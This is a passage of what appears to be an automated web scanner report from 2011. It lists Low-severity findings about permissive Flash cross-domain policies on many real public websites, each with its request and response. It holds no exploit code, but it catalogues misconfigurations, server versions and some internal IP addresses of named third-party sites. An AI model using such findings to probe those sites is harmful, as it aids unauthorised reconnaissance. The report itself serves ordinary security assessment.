7.175. http://www.azcentral.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.azcentral.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.azcentral.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:13 GMT
Server: Apache
Last-Modified: Mon, 05 Oct 2009 16:44:19 GMT
Accept-Ranges: bytes
Content-Length: 289
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="*.azcentral.com"/>
...[SNIP]...

7.176. http://www.babiesrus.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.babiesrus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.babiesrus.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:39 GMT
Server: Apache/2.0.63 (Unix)
Vary: Host,Accept-Encoding
Last-Modified: Thu, 22 Jul 2010 08:45:04 GMT
ETag: "540db5-39b-48bf5ef3f6400"
Accept-Ranges: bytes
Content-Length: 923
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:27:39 GMT
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.toysrus.com" />
<allow-access-from domain="www.babiesrus.com" />
<allow-access-from domain="trus.imageg.net" />
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="63.240.110.201" />
<allow-access-from domain="206.16.220.201" />
<allow-access-from domain="172.20.1.201" />
<allow-access-from domain="172.21.1.201" />
<allow-access-from domain="vqascweb1.crossmediaservices.com" secure="true" />
...[SNIP]...
<allow-access-from domain="vqascweb2.crossmediaservices.com" secure="true" />
...[SNIP]...
<allow-access-from domain="toysrus.shoplocal.com" secure="true" />
...[SNIP]...
<allow-access-from domain="beta.crossmediaservices.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

7.177. http://www.babycenter.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.babycenter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.babycenter.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: W/"225-1300928296000"
Last-Modified: Thu, 24 Mar 2011 00:58:16 GMT
Content-Length: 225
Content-Type: text/xml
Cache-Control: private, no-cache, must-revalidate, proxy-revalidate
Expires: Sat, 02 Apr 2011 13:25:44 GMT
Date: Sat, 02 Apr 2011 13:25:44 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.babycenter.com" secure="false" />
...[SNIP]...

7.178. http://www.barackobama.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.barackobama.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.barackobama.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 364
Content-Type: text/xml
ETag: "124389-16c-461ae1cf71040"
Expires: Sat, 02 Apr 2011 14:41:57 GMT
Last-Modified: Fri, 30 Jan 2009 07:25:45 GMT
Accept-Ranges: bytes
Server: Apache
Date: Sat, 02 Apr 2011 13:41:57 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="barackobama.com" />    <allow-access-from domain="*.barackobama.com" />    <allow-access-from domain="oadmin.pacew.com" />    <allow-access-from domain="obama.3cdn.net" />
...[SNIP]...

7.179. http://www.barbie.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.barbie.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.barbie.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:54:36 GMT
Server: MII-WSD/1.4
Content-Type: text/xml
Last-Modified: Tue, 24 Jun 2008 17:49:48 GMT
Accept-Ranges: bytes
ETag: "467218b222d6c81:3f6"
X-Powered-By: ASP.NET
Age: 3090
Via: HTTP/1.1 www.barbie.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Expires: Sat, 02 Apr 2011 15:54:36 GMT
Cache-Control: max-age=10800
Via: 1.0 mdw107008 (MII-APC/1.6)
Content-Length: 506
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.everythinggirl.com" />
<allow-access-from domain="*.mattel.net" />
<allow-access-from domain="stageeverythinggirl.mattel.net" />
<allow-access-from domain="*.eshq.mattel.com" />
<allow-access-from domain="*.corp.mattel.com" />
<allow-access-from domain="www.everythinggirl.com" />
...[SNIP]...

7.180. http://www.barnesandnoble.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.barnesandnoble.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.barnesandnoble.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Length: 128
Content-Type: text/xml
Last-Modified: Tue, 11 Sep 2007 16:08:18 GMT
Accept-Ranges: bytes
ETag: "054ef78df4c71:479"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR ADM DEV TAI PSA IVDo CONo HIS TELo DEL SAMo UNRo LEG PRE"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:14 GMT
Connection: close
Set-Cookie: datacenter=nj;path=/;domain=barnesandnoble.com;

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.barnesandnoble.com" />
</cross-domain-policy>

7.181. http://www.bathandbodyworks.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bathandbodyworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bathandbodyworks.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:44 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Mar 2011 09:16:11 GMT
ETag: "a7d5b4-2fc-49d7c5d242cc0"
Accept-Ranges: bytes
Content-Length: 764
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 14:05:44 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.bbw.com" />
<allow-access-from domain="bbw.com" />
...[SNIP]...
<allow-access-from domain="reviews.bathandbodyworks.com" />
<allow-access-from domain="bathandbodyworks.com" />
<allow-access-from domain="bbw.imageg.net" />
<allow-access-from domain="bbw.cat.imageg.net" />
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="bbw.sec.imageg.net" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

7.182. http://www.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bbc.co.uk

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/xml
Date: Sat, 02 Apr 2011 12:43:24 GMT
Keep-Alive: timeout=4, max=200
Accept-Ranges: bytes
Connection: close
Last-Modified: Thu, 13 May 2010 10:26:51 GMT
Content-Length: 1216

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="news.bbc.co.uk" />
<allow-access-from domain="newsimg.bbc.co.uk"/>
<allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
<allow-access-from domain="newsrss.bbc.co.uk" />
<allow-access-from domain="newsapi.bbc.co.uk" />
<allow-access-from domain="extdev.bbc.co.uk" />
<allow-access-from domain="stats.bbc.co.uk" />
<allow-access-from domain="*.bbc.co.uk" />
<allow-access-from domain="*.bbc.net.uk" />
<allow-access-from domain="*.bbc.com" />
<allow-access-from domain="*.bbcamerica.com" />
<allow-access-from domain="www.bbcamerica.com" />
<allow-access-from domain="*.bbcimg.co.uk" />
<allow-access-from domain="node1.bbcimg.co.uk" />
<allow-access-from domain="node2.bbcimg.co.uk" />
<allow-access-from domain="node3.bbcimg.co.uk" />
<allow-access-from domain="node4.bbcimg.co.uk" />
<allow-access-from domain="news.bbcimg.co.uk" />
...[SNIP]...

7.183. http://www.bettycrocker.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bettycrocker.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bettycrocker.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Type: text/xml
Last-Modified: Wed, 09 Mar 2011 11:40:50 GMT
Accept-Ranges: bytes
ETag: "6cc41ad74edecb1:0"
Server: Microsoft-IIS/7.0
Content-Length: 226
Date: Sat, 02 Apr 2011 13:45:49 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bettycrocker.com" />
...[SNIP]...

7.184. http://www.blastro.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.blastro.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blastro.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:24 GMT
Server: Apache/2.2.16 (Unix)
Vary: Accept-Encoding
Content-Length: 526
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.blastro.com" />
<allow-access-from domain="*.roxwel.com" />
<allow-access-from domain="*.yallwire.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.adxcel.com"/>
<allow-access-from domain="*.dev.adxcel.com"/>
...[SNIP]...

7.185. http://www.blogtv.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.blogtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blogtv.com

Response

HTTP/1.1 200 OK
Content-Length: 277
Content-Type: text/xml
Last-Modified: Sun, 06 Jun 2010 16:19:14 GMT
Accept-Ranges: bytes
ETag: "879c561945cb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:00:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.blogtv.com" />
...[SNIP]...

7.186. http://www.bluemountain.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bluemountain.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bluemountain.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:38 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 18:05:29 GMT
ETag: "12590bc-1d4-70484c40"
Accept-Ranges: bytes
Content-Length: 468
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.beta.americangreetings.com" />
<allow-access-from domain="*.americangreetings.com" />
<allow-access-from domain="*.bluemountain.com" />
<allow-access-from domain="*.imgag.com" secure="false" />
...[SNIP]...

7.187. http://www.bnet.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bnet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:30 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1032
Keep-Alive: timeout=15, max=1000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.builder.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="*.eyewonderlabs.com" />
...[SNIP]...

7.188. http://www.bodybuilding.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bodybuilding.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bodybuilding.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 17 Jan 2007 17:03:00 GMT
ETag: "eac1f2-11d-4273f73703900"-gzip
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:38:17 GMT
Content-Length: 285
Connection: close

<?xml version="1.0"?>
<!-- http://www.bodybuilding.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.bodybuilders.com" />
<allow-access-from domain="*.bodybuilding.com" />
<allow-access-from domain="*.teenbodybuilding.com" />
...[SNIP]...

7.189. http://www.britannica.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.britannica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.britannica.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:31 GMT
Server: Apache/2.0.64 (Unix) mod_jk/1.2.31
Last-Modified: Mon, 23 Aug 2010 21:50:25 GMT
ETag: "a682f3-469-48e84a2ccca40"
Accept-Ranges: bytes
Content-Length: 1129
Vary: Accept-Encoding,User-Agent
MyHeader: web101-b
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.britannica.com"/>
<allow-access-from domain="*.eb.com"/>
<allow-access-from domain="*.eb.com.au"/>
<allow-access-from domain="*.eb.co.uk"/>
<allow-access-from domain="*.ebonline.com"/>
<allow-access-from domain="*.ebonline.co.nz"/>
...[SNIP]...
<allow-access-from domain="redir.adap.tv"/>
...[SNIP]...

7.190. http://www.businessweek.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.businessweek.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.businessweek.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.31
benv: nybweb02
bvh: www.businessweek.com
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:25:41 GMT
Content-Length: 243
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!-- http://www.businessweek.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.businessweek.com" />
<allow-access-from domain="*.mcgraw-hill.com" />
...[SNIP]...

7.191. http://www.buy.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.buy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.buy.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 01 Feb 2010 23:12:53 GMT
Accept-Ranges: bytes
ETag: "28ddf51494a3ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 917
Date: Sat, 02 Apr 2011 13:37:44 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="intel.mrmworldwide.com" />
<allow-access-from domain="motifcdn2.doubleclick.net" secure="true" />
<allow-access-from domain="motifcdn.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m1.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ak.buy.com" />
<allow-access-from domain="rss.buy.com" />
<allow-access-from domain="*.llnwd.net" />
<allow-access-from domain="*.buyservices.com" />
...[SNIP]...

7.192. http://www.cabelas.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cabelas.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cabelas.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 28 Mar 2011 21:28:32 GMT
Content-Type: text/xml
Expires: Sat, 02 Apr 2011 13:32:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:32:03 GMT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!-- http://www.cabelas.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cabelas.com" />
...[SNIP]...

7.193. http://www.canada.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.canada.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.canada.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/xml; charset=utf-8
Content-Length: 527
Cache-Control: private, max-age=300
Date: Sat, 02 Apr 2011 13:41:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.canada.com" />
   <allow-access-from domain="*.mavenapps.net" />
   <allow-access-from domain="query.mcms.mavenapps.net" />
   <allow-access-from domain="*.maventechnologies.com" />
   <allow-access-from domain="*.maven.net" />
   <allow-access-from domain="www.househunting.ca" />
   <allow-access-from domain="*.househunting.ca" />
...[SNIP]...

7.194. http://www.candystand.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.candystand.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.candystand.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Mar 2011 20:22:30 GMT
ETag: "a10a5-dc-49f403c958d80"
Accept-Ranges: bytes
Content-Length: 220
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:23:02 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.candystand.com"/>
</
...[SNIP]...

7.195. http://www.caranddriver.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.caranddriver.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.caranddriver.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) DAV/2 PHP/5.2.6
Last-Modified: Tue, 17 Nov 2009 11:36:10 GMT
ETag: "69473e-ca-4788f88587e80"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: application/xml
Cache-Control: max-age=60
Date: Sat, 02 Apr 2011 14:03:34 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>

<cross-domain-policy>


<allow-access-from domain="*.hfmus.com" />

<allow-access-from domain="*.caranddriver.com" />


</cross-domain-policy>
...[SNIP]...

7.196. http://www.careerbuilder.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.careerbuilder.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Wed, 19 Jan 2011 13:51:09 GMT
Accept-Ranges: bytes
